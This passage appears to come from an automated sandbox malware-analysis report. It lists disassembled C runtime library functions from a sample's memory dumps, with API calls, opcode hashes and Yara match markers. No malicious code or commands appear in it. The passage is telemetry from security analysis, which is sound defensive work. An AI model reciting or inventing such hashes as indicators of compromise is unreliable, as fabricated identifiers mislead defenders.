API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 501a0837026fe0814ab2d6a77f43a53b196c1575d4fb2c1b0167c2d280276289
Instruction ID: be7813cec9e76b844f682d4c097dbd82c10abeb52ecb146189267b1763b940f2
Opcode Fuzzy Hash: 501a0837026fe0814ab2d6a77f43a53b196c1575d4fb2c1b0167c2d280276289
Instruction Fuzzy Hash: 1F114272541B24B6D920BB72DC07FCBB7DCBF44708F40081EBE9E66052DA7DB5868654

Uniqueness

Uniqueness Score: -1.00%

Function 05CAF513 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 05CAF25A: _free.LIBCMT ref: 05CAF283

_free.LIBCMT ref: 05CAF561

Part of subcall function 05CA6501: HeapFree.KERNEL32(00000000,00000000,?,05CAF288,?,00000000,?,00000000,?,05CAF52C,?,00000007,?,?,05CAF920,?), ref: 05CA6517
Part of subcall function 05CA6501: GetLastError.KERNEL32(?,?,05CAF288,?,00000000,?,00000000,?,05CAF52C,?,00000007,?,?,05CAF920,?,?), ref: 05CA6529

_free.LIBCMT ref: 05CAF56C
_free.LIBCMT ref: 05CAF577
_free.LIBCMT ref: 05CAF5CB
_free.LIBCMT ref: 05CAF5D6
_free.LIBCMT ref: 05CAF5E1
_free.LIBCMT ref: 05CAF5EC

Memory Dump Source

Source File: 00000006.00000002.2694253971.0000000005C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5c90000_i1.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 501a0837026fe0814ab2d6a77f43a53b196c1575d4fb2c1b0167c2d280276289
Instruction ID: 351e51a0185742553fcf28cfd0b6796c314a3e4d8f04a550607172ac9eac997a
Opcode Fuzzy Hash: 501a0837026fe0814ab2d6a77f43a53b196c1575d4fb2c1b0167c2d280276289
Instruction Fuzzy Hash: BB118477E40705AADA31B7B0CC4EFCB7F9D6F44704F440D18A69A66050EA39F544AB51

Uniqueness

Uniqueness Score: -1.00%

Function 00404189 Relevance: 10.6, APIs: 7, Instructions: 59COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040418E
std::_Lockit::_Lockit.LIBCPMT ref: 0040419D
int.LIBCPMT ref: 004041B4

Part of subcall function 00401318: std::_Lockit::_Lockit.LIBCPMT ref: 00401329
Part of subcall function 00401318: std::_Lockit::~_Lockit.LIBCPMT ref: 00401343

std::locale::_Getfacet.LIBCPMT ref: 004041BD
std::_Facet_Register.LIBCPMT ref: 004041EE
std::_Lockit::~_Lockit.LIBCPMT ref: 00404204
__CxxThrowException@8.LIBVCRUNTIME ref: 0040422A

Memory Dump Source

Source File: 00000006.00000002.2690106543.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_i1.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
String ID:
API String ID: 1202896665-0
Opcode ID: e4831a17e9389af87c191ca157e46dd7d187b50277cf216024756019587e60ea
Instruction ID: eeb1616ca6cccce41a0e0e35b82109652f5c3a79b41a9d78a32d17684d72b000
Opcode Fuzzy Hash: e4831a17e9389af87c191ca157e46dd7d187b50277cf216024756019587e60ea
Instruction Fuzzy Hash: AD119072A041289BCB04EBA5DC06AEE7774EF84358F10456FF915B72D1DB389A04C7A9

Uniqueness

Uniqueness Score: -1.00%

Function 05C943F0 Relevance: 10.6, APIs: 7, Instructions: 59COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 05C943F5
std::_Lockit::_Lockit.LIBCPMT ref: 05C94404
int.LIBCPMT ref: 05C9441B

Part of subcall function 05C9157F: std::_Lockit::_Lockit.LIBCPMT ref: 05C91590
Part of subcall function 05C9157F: std::_Lockit::~_Lockit.LIBCPMT ref: 05C915AA

std::locale::_Getfacet.LIBCPMT ref: 05C94424
std::_Facet_Register.LIBCPMT ref: 05C94455
std::_Lockit::~_Lockit.LIBCPMT ref: 05C9446B
__CxxThrowException@8.LIBVCRUNTIME ref: 05C94491

Memory Dump Source

Source File: 00000006.00000002.2694253971.0000000005C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5c90000_i1.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
String ID:
API String ID: 1202896665-0
Opcode ID: e4831a17e9389af87c191ca157e46dd7d187b50277cf216024756019587e60ea
Instruction ID: 135e6a0d85a7857ef2ac459233b28a947a0023fd46071f1ba957ba857e135cba
Opcode Fuzzy Hash: e4831a17e9389af87c191ca157e46dd7d187b50277cf216024756019587e60ea
Instruction Fuzzy Hash: 2811C472E001199BCF0CEBA4DC4DAEE77B5FF84614F15495AE815A7290EB749A02C7D0

Uniqueness

Uniqueness Score: -1.00%

Function 004033EA Relevance: 10.6, APIs: 7, Instructions: 57COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004033EF
std::_Lockit::_Lockit.LIBCPMT ref: 004033FE
int.LIBCPMT ref: 00403415

Part of subcall function 00401318: std::_Lockit::_Lockit.LIBCPMT ref: 00401329
Part of subcall function 00401318: std::_Lockit::~_Lockit.LIBCPMT ref: 00401343

std::locale::_Getfacet.LIBCPMT ref: 0040341E
std::_Facet_Register.LIBCPMT ref: 0040344F
std::_Lockit::~_Lockit.LIBCPMT ref: 00403465
__CxxThrowException@8.LIBVCRUNTIME ref: 0040348B

Memory Dump Source

Source File: 00000006.00000002.2690106543.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_i1.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
String ID:
API String ID: 1202896665-0
Opcode ID: d912247cf65187564cb857c5a435760ff66a759f63cb392730071c1b62a8ae47
Instruction ID: cdc69c2a9e90ba919e1258be772e803faed7ee3eebec81448dba6679bc4cf361
Opcode Fuzzy Hash: d912247cf65187564cb857c5a435760ff66a759f63cb392730071c1b62a8ae47
Instruction Fuzzy Hash: 8E11BF329001289BCB05EFA4C815AEE7B78EF84319F10452EE911BB2D1DB789A04CB99

Uniqueness

Uniqueness Score: -1.00%

Function 004035F5 Relevance: 10.6, APIs: 7, Instructions: 57COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004035FA
std::_Lockit::_Lockit.LIBCPMT ref: 00403609
int.LIBCPMT ref: 00403620

Part of subcall function 00401318: std::_Lockit::_Lockit.LIBCPMT ref: 00401329
Part of subcall function 00401318: std::_Lockit::~_Lockit.LIBCPMT ref: 00401343

std::locale::_Getfacet.LIBCPMT ref: 00403629
std::_Facet_Register.LIBCPMT ref: 0040365A
std::_Lockit::~_Lockit.LIBCPMT ref: 00403670
__CxxThrowException@8.LIBVCRUNTIME ref: 00403696

Memory Dump Source

Source File: 00000006.00000002.2690106543.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_i1.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
String ID:
API String ID: 1202896665-0
Opcode ID: 01699667aa2a77937d9adaa910a4886983fe4db3813f95f217182bdb03a19c45
Instruction ID: 76a64bb1f13388b8652502aa8a079a3a0bf37f657045f8e793a704159d5c315e
Opcode Fuzzy Hash: 01699667aa2a77937d9adaa910a4886983fe4db3813f95f217182bdb03a19c45
Instruction Fuzzy Hash: FA119032900124ABCB14EF65C805AEE7B74AF48319F10456FE911B73D1DB389A04C799

Uniqueness

Uniqueness Score: -1.00%

Function 05C93651 Relevance: 10.6, APIs: 7, Instructions: 57COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 05C93656
std::_Lockit::_Lockit.LIBCPMT ref: 05C93665
int.LIBCPMT ref: 05C9367C

Part of subcall function 05C9157F: std::_Lockit::_Lockit.LIBCPMT ref: 05C91590
Part of subcall function 05C9157F: std::_Lockit::~_Lockit.LIBCPMT ref: 05C915AA

std::locale::_Getfacet.LIBCPMT ref: 05C93685
std::_Facet_Register.LIBCPMT ref: 05C936B6
std::_Lockit::~_Lockit.LIBCPMT ref: 05C936CC
__CxxThrowException@8.LIBVCRUNTIME ref: 05C936F2

Memory Dump Source

Source File: 00000006.00000002.2694253971.0000000005C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5c90000_i1.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
String ID:
API String ID: 1202896665-0
Opcode ID: d912247cf65187564cb857c5a435760ff66a759f63cb392730071c1b62a8ae47
Instruction ID: de48aba39a4df113fdc4b980d807c7498f3e354b1726048c465ec1160dff8dec
Opcode Fuzzy Hash: d912247cf65187564cb857c5a435760ff66a759f63cb392730071c1b62a8ae47
Instruction Fuzzy Hash: A511CE72E001699BCF08EBA4C80CAEE77B5FF85720F140D1AE812A7390DB749A00D7D4

Uniqueness

Uniqueness Score: -1.00%

Function 05C9385C Relevance: 10.6, APIs: 7, Instructions: 57COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 05C93861
std::_Lockit::_Lockit.LIBCPMT ref: 05C93870
int.LIBCPMT ref: 05C93887

Part of subcall function 05C9157F: std::_Lockit::_Lockit.LIBCPMT ref: 05C91590
Part of subcall function 05C9157F: std::_Lockit::~_Lockit.LIBCPMT ref: 05C915AA

std::locale::_Getfacet.LIBCPMT ref: 05C93890
std::_Facet_Register.LIBCPMT ref: 05C938C1
std::_Lockit::~_Lockit.LIBCPMT ref: 05C938D7
__CxxThrowException@8.LIBVCRUNTIME ref: 05C938FD

Memory Dump Source

Source File: 00000006.00000002.2694253971.0000000005C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5c90000_i1.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
String ID:
API String ID: 1202896665-0
Opcode ID: 01699667aa2a77937d9adaa910a4886983fe4db3813f95f217182bdb03a19c45
Instruction ID: 19a6f75ecd6f5b35a4a7dfae7fbc4deb62651a6e023b6a21811cb03a81f388e9
Opcode Fuzzy Hash: 01699667aa2a77937d9adaa910a4886983fe4db3813f95f217182bdb03a19c45
Instruction Fuzzy Hash: F311E372E001259BCF09EBA4C80CAEEB7B5FF84710F140D1AE811B7290DB749A00DB94

Uniqueness

Uniqueness Score: -1.00%

Function 00427AC0 Relevance: 9.3, APIs: 6, Instructions: 276COMMONLIBRARYCODE

Download Yara Rule

APIs

_ValidateScopeTableHandlers.LIBCMT ref: 00427BD0
__FindPESection.LIBCMT ref: 00427BEA

Memory Dump Source

Source File: 00000006.00000002.2690106543.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_i1.jbxd

Similarity

API ID: FindHandlersScopeSectionTableValidate
String ID:
API String ID: 876702719-0
Opcode ID: bc384f76d8f635c5b2c6c749d7951069b59a0ece1133742fdae5e3cbfd5bbb72
Instruction ID: 52cd69d4b64803fa133344d4e9d29b6b42e74987d25fff38166c3f8cc652100c
Opcode Fuzzy Hash: bc384f76d8f635c5b2c6c749d7951069b59a0ece1133742fdae5e3cbfd5bbb72
Instruction Fuzzy Hash: 73A1D172B08225CFCB15CF69E9807AEB7B4EB44314F95466AD805EB351D739EC00CB98

Uniqueness

Uniqueness Score: -1.00%

Function 05CB7D27 Relevance: 9.3, APIs: 6, Instructions: 276COMMONLIBRARYCODE

Download Yara Rule

APIs

_ValidateScopeTableHandlers.LIBCMT ref: 05CB7E37
__FindPESection.LIBCMT ref: 05CB7E51

Memory Dump Source

Source File: 00000006.00000002.2694253971.0000000005C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5c90000_i1.jbxd

Yara matches

Similarity

API ID: FindHandlersScopeSectionTableValidate
String ID:
API String ID: 876702719-0
Opcode ID: bc384f76d8f635c5b2c6c749d7951069b59a0ece1133742fdae5e3cbfd5bbb72
Instruction ID: 6377099b36127ba0c082582e60d19b135ed8dddb0aec3c4de931d279bdf848c2
Opcode Fuzzy Hash: bc384f76d8f635c5b2c6c749d7951069b59a0ece1133742fdae5e3cbfd5bbb72
Instruction Fuzzy Hash: F5A1BD32A04651CFEB18CFA8D884AE9B7F9FB88350F144A29DC05AB350D7B5ED41CB94

Uniqueness

Uniqueness Score: -1.00%

Function 05CA69A6 Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,?,?,?,?,05CA6BF7,00000001,00000001,?), ref: 05CA6A00
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,05CA6BF7,00000001,00000001,?,?,?,?), ref: 05CA6A86
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 05CA6B80
__freea.LIBCMT ref: 05CA6B8D

Part of subcall function 05CA7CAC: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 05CA7CDE

__freea.LIBCMT ref: 05CA6B96
__freea.LIBCMT ref: 05CA6BBB

Memory Dump Source

Source File: 00000006.00000002.2694253971.0000000005C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5c90000_i1.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 2e994442627aa9f9a0c237f5ce444149c9e688fee8ef3ecc4bad462f2a91c68e
Instruction ID: b75bc7776c16109d74025819534ba8e2fa41281f4b6cac4b1573a4a2270c6661
Opcode Fuzzy Hash: 2e994442627aa9f9a0c237f5ce444149c9e688fee8ef3ecc4bad462f2a91c68e
Instruction Fuzzy Hash: B751C273B00217ABDB258F64DC44EAB7BAAEB44758F184A29ED06D7180DB74DD80E690

Uniqueness

Uniqueness Score: -1.00%

Function 00411A6C Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftoe.LIBCMT ref: 00411A98
__cftoe.LIBCMT ref: 00411ACA

Memory Dump Source

Source File: 00000006.00000002.2690106543.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_i1.jbxd

Similarity

API ID: __cftoe
String ID:
API String ID: 4189289331-0
Opcode ID: 3abcaf1d833c0b43dbdf51c67ed2576d6ab8f65321eebda5ff6643d6b04ddf7b
Instruction ID: df7bbd6b43df22bb4be9fc1c410e64f9820c02350ec4393f10609d324cfe3ba4
Opcode Fuzzy Hash: 3abcaf1d833c0b43dbdf51c67ed2576d6ab8f65321eebda5ff6643d6b04ddf7b
Instruction Fuzzy Hash: 7551FD72904205ABDF209B699D41EEF77A99F48364F10011FFA15962A2EB3DDD80C65C

Uniqueness

Uniqueness Score: -1.00%

Function 05CA1CD3 Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftoe.LIBCMT ref: 05CA1CFF
__cftoe.LIBCMT ref: 05CA1D31

Memory Dump Source

Source File: 00000006.00000002.2694253971.0000000005C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5c90000_i1.jbxd

Yara matches

Similarity

API ID: __cftoe
String ID:
API String ID: 4189289331-0
Opcode ID: 90da76973bb766ea4a315db8452379bb561b87577be5415ac3e43ae82e0a4dd4
Instruction ID: 32e592b6099c2b1bbc9c21c271631f12b3017f1625f200984eefb33009f2ce0d
Opcode Fuzzy Hash: 90da76973bb766ea4a315db8452379bb561b87577be5415ac3e43ae82e0a4dd4
Instruction Fuzzy Hash: 11514833E04603ABDF259BA98C48EBA7FA9FF4836CF180A19E815D6181DB35C640D660

Uniqueness

Uniqueness Score: -1.00%

Function 0040C9BB Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0040C9B2,0040A25B), ref: 0040C9C9
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0040C9D7
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0040C9F0
SetLastError.KERNEL32(00000000,?,0040C9B2,0040A25B), ref: 0040CA42

Memory Dump Source

Source File: 00000006.00000002.2690106543.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_i1.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: a89c5195120a82154cc37d67133d9963b678ac02c8548023733cd8c502b1c527
Instruction ID: ee19b3e2510f7423959140ec21889b16034e20938e88c6190324d52fb0663b51
Opcode Fuzzy Hash: a89c5195120a82154cc37d67133d9963b678ac02c8548023733cd8c502b1c527
Instruction Fuzzy Hash: 8601F572649215AEE6395FB9BDC56572A54DB01338720033FF214B12F0EA794C16954C

Uniqueness

Uniqueness Score: -1.00%

Function 05C9CC22 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,05C9CC19,05C9A4C2), ref: 05C9CC30
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 05C9CC3E
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 05C9CC57
SetLastError.KERNEL32(00000000,?,05C9CC19,05C9A4C2), ref: 05C9CCA9

Memory Dump Source

Source File: 00000006.00000002.2694253971.0000000005C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5c90000_i1.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 152d12fcc9b38d6eb509e9b18f925b7f1960da531015352f4daf10028e3799ab
Instruction ID: 84811de23066ea14faabb2cd7a5240d07aaea953d96df4249b74198d07b99c59
Opcode Fuzzy Hash: 152d12fcc9b38d6eb509e9b18f925b7f1960da531015352f4daf10028e3799ab
Instruction Fuzzy Hash: 8101D8323097125EAF2D6A757D8C9773F56FB016B67200A3DF225A10F0EF214D1165C4

Uniqueness

Uniqueness Score: -1.00%

Function 00416D19 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
_free.LIBCMT ref: 00416D50
_free.LIBCMT ref: 00416D78
SetLastError.KERNEL32(00000000), ref: 00416D85
SetLastError.KERNEL32(00000000), ref: 00416D91
_abort.LIBCMT ref: 00416D97

Memory Dump Source

Source File: 00000006.00000002.2690106543.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_i1.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: a2875e3ccb6b8632a006c07bc9f65a419aef02cbdef471612c5cc690c003f94f
Instruction ID: dffb23d06d1e15ef1aad1c845134e5c8e8eacf90562cc3591d5b7c0101a08115
Opcode Fuzzy Hash: a2875e3ccb6b8632a006c07bc9f65a419aef02cbdef471612c5cc690c003f94f
Instruction Fuzzy Hash: BDF0F43178871026C2227B367C0ABDB26299FC1775F22052FF91D92291EF2CDCC2815D

Uniqueness

Uniqueness Score: -1.00%

Function 05CA6F80 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,05C9E697,?,?,?,05C9ED94,?), ref: 05CA6F84
_free.LIBCMT ref: 05CA6FB7
_free.LIBCMT ref: 05CA6FDF
SetLastError.KERNEL32(00000000), ref: 05CA6FEC
SetLastError.KERNEL32(00000000), ref: 05CA6FF8
_abort.LIBCMT ref: 05CA6FFE

Memory Dump Source

Source File: 00000006.00000002.2694253971.0000000005C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5c90000_i1.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: a2875e3ccb6b8632a006c07bc9f65a419aef02cbdef471612c5cc690c003f94f
Instruction ID: f9a5384669075c6949ca79038ecfa2b27196d96c4b79460e3f04540aa6a51ec6
Opcode Fuzzy Hash: a2875e3ccb6b8632a006c07bc9f65a419aef02cbdef471612c5cc690c003f94f
Instruction Fuzzy Hash: B7F0F93BF486136AC22223756C0CF6B2D56ABC17B9F2D0C34F815D2290EE2189825159

Uniqueness

Uniqueness Score: -1.00%

Function 00417253 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,-@,00000000,00000000,?,004171FA,-@,00000000,00000000,00000000,?,004174B2,00000006,FlsSetValue), ref: 00417285
GetLastError.KERNEL32(?,004171FA,-@,00000000,00000000,00000000,?,004174B2,00000006,FlsSetValue,0042F340,FlsSetValue,00000000,00000364,?,00416DEB), ref: 00417291
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004171FA,-@,00000000,00000000,00000000,?,004174B2,00000006,FlsSetValue,0042F340,FlsSetValue,00000000), ref: 0041729F

Strings

-@, xrefs: 0041727C

Memory Dump Source

Source File: 00000006.00000002.2690106543.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_i1.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: -@
API String ID: 3177248105-2564449678
Opcode ID: 26bf22cc59954dcc6720876a51754d7684b8387ef23ad7c861cfe47f39fec3a2
Instruction ID: 7e42d4c6809e44159ca8b586cb0097734ec1077dc4da662fe3f049ba49388dcf
Opcode Fuzzy Hash: 26bf22cc59954dcc6720876a51754d7684b8387ef23ad7c861cfe47f39fec3a2
Instruction Fuzzy Hash: 8B01F7367492279BC7314B699C44A977BB8AF55760B500671F909D7240DB34DC43C6E8

Uniqueness

Uniqueness Score: -1.00%

Function 0040187F Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 39COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 004018C9
std::system_error::system_error.LIBCPMT ref: 004018D8

Strings

ios_base::badbit set, xrefs: 00401890, 004018B1
ios_base::failbit set, xrefs: 0040189B, 004018D2
ios_base::eofbit set, xrefs: 004018A0

Memory Dump Source

Source File: 00000006.00000002.2690106543.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_i1.jbxd

Similarity

API ID: Exception@8Throwstd::system_error::system_error
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 1589814233-1866435925
Opcode ID: 2b3e5ca4bc1d127b2dba606601132dddbbf971fcac2ee0ac16a13b9037fe9581
Instruction ID: e154b9f444e369befffee57ff699e9c141b04c4d0561678f3d19f5bf610271a8
Opcode Fuzzy Hash: 2b3e5ca4bc1d127b2dba606601132dddbbf971fcac2ee0ac16a13b9037fe9581
Instruction Fuzzy Hash: AEF0226280031CB7DB10BAA18C02FEA7B988F0A754F21C03BFD40361E0E77D5A0482ED

Uniqueness

Uniqueness Score: -1.00%

Function 05C91AE6 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 39COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 05C91B30
std::system_error::system_error.LIBCPMT ref: 05C91B3F

Strings

ios_base::badbit set, xrefs: 05C91AF7, 05C91B18
ios_base::failbit set, xrefs: 05C91B02, 05C91B39
ios_base::eofbit set, xrefs: 05C91B07

Memory Dump Source

Source File: 00000006.00000002.2694253971.0000000005C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5c90000_i1.jbxd

Yara matches

Similarity

API ID: Exception@8Throwstd::system_error::system_error
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 1589814233-1866435925
Opcode ID: 2b3e5ca4bc1d127b2dba606601132dddbbf971fcac2ee0ac16a13b9037fe9581
Instruction ID: 6e7d8e37e893cc5a0a9116c8be6656090e9ba301174cc89623f4020b0ec9553b
Opcode Fuzzy Hash: 2b3e5ca4bc1d127b2dba606601132dddbbf971fcac2ee0ac16a13b9037fe9581
Instruction Fuzzy Hash: 15F0F6B160035EB7DF18AA90CC0EFE97B999F09690F19C825ED4466180EBF55E04C2E8

Uniqueness

Uniqueness Score: -1.00%

Function 00413A6C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00413A1D,00000003,?,004139BD,00000003,00438DB0,0000000C,00413B14,00000003,00000002), ref: 00413A8C
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00413A9F
FreeLibrary.KERNEL32(00000000,?,?,?,00413A1D,00000003,?,004139BD,00000003,00438DB0,0000000C,00413B14,00000003,00000002,00000000), ref: 00413AC2

Strings

CorExitProcess, xrefs: 00413A97
mscoree.dll, xrefs: 00413A85

Memory Dump Source

Source File: 00000006.00000002.2690106543.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_i1.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 9dff5006f0e47c0e7765be968ad1406b64006eb2177cec7e1fa0986365244e9b
Instruction ID: 222490b34c4e53a5feae2b87ffa662e2080e553be967456abbd25fb90b6b76cf
Opcode Fuzzy Hash: 9dff5006f0e47c0e7765be968ad1406b64006eb2177cec7e1fa0986365244e9b
Instruction Fuzzy Hash: 1EF08130A10218FBDB109F91DC09BAEBFB8EF54752F400069F809A2290DB344E45CA9C

Uniqueness

Uniqueness Score: -1.00%

Function 0041A950 Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2690106543.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_i1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0eed48df6d33df695e27a89dff6e70afad1f3040da07926e72b140e158843729
Instruction ID: b33920a143986800139fcf22d81ba1a33bebe7e0c53b62ede7835c02ac38fde1
Opcode Fuzzy Hash: 0eed48df6d33df695e27a89dff6e70afad1f3040da07926e72b140e158843729
Instruction Fuzzy Hash: 9E712A71D062969BCB308F94C844AFFBB76EF41360F14022BE91457280D774ACE1C7AA

Uniqueness

Uniqueness Score: -1.00%

Function 05CAABB7 Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2694253971.0000000005C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5c90000_i1.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0eed48df6d33df695e27a89dff6e70afad1f3040da07926e72b140e158843729
Instruction ID: e70701e5cb1432f3723437f48db10cd07e79042171483064d47008e4972c40b8
Opcode Fuzzy Hash: 0eed48df6d33df695e27a89dff6e70afad1f3040da07926e72b140e158843729
Instruction Fuzzy Hash: E271B032E0425B9BDB35CF55CC84ABEBF7AFF41319F180A29E85167141DB758A41CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00415063 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 004150D5
_free.LIBCMT ref: 004150F5

Memory Dump Source

Source File: 00000006.00000002.2690106543.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_i1.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: a53c037777d8b1b2115bf159d204196ca41bb946c20c2e3f835a11376dbc8933
